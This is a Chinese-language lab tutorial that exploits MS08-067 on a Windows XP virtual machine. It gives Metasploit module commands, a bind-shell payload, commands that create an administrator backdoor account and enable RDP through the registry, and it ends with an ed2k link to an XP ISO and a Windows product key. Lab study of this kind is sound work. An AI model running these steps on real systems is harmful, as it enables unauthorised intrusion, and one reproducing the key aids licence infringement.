MS08-067利用

一、概述
利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,并成功进行3389登录。
用到的端口:445、3389


二、实验环境(虚拟机搭建)
目标:windows xp professional sp3 英文版(中文版测试不成功)

攻击:Kali Linux

三、攻击过程
1.获取靶机和Kali Linux的IP地址
Windows:DOS窗口输入命令

 ipconfig /all

Kali Linux:终端输入命令

 ifconfig

1.png

并且能相互ping

2.调用Kali Linux中msfconsole工具的ms08-067漏洞攻击模块

以下所有操作都是在Kali Linux的终端中完成

启动msfconsole工具

 msfconsole

2.png

输入

 search ms08-067

(查找漏洞攻击模块)

输入

 use exploit/windows/smb/ms08_067_netapi

(使用该模块)

3.png

3.配置options

set LHOST 172.16.165.137

set RHOST 172.16.165.135

set RPORT 445

4.png

 show payloads

5.png

set payload generic/shell_bind_tcp

show options

6.png

4.实施攻击

 exploit

7.png

此时可以直接远程使用DOS命令对Windows进行操作

5.对Windwos进行远程连接

 net user admin pass /add && net localgroup administrators admin /add

(在Windows上创建一个名称为admin密码为pass的用户,并提升为管理员权限)

8.png

 echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

(开启windows远程登录端口)或直接用msf自带模块开启rdp

9.png

 netstat -an

(检查3389端口是否开启)

10.png

重新打开一个终端

 rdesktop 172.16.165.135

进行远程登录

11.png

输入创建的用户名admin和密码pass回车 弹出提示框 点击OK 稍等就会成功远程登录

12.png

漏洞利用成功

四、用到的资源

Windows XP SP3 英文版下载地址:

ed2k://|file|en_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-73974.iso|617754624|7d1e7466df638674202dd8e7451c0b39|h=5JYEVQUSWB7WMCVM7JWGPNOIZFNTQXJY|

序列码:DP7CM-PD6MC-6BKXT-M8JJ6-RPXGJ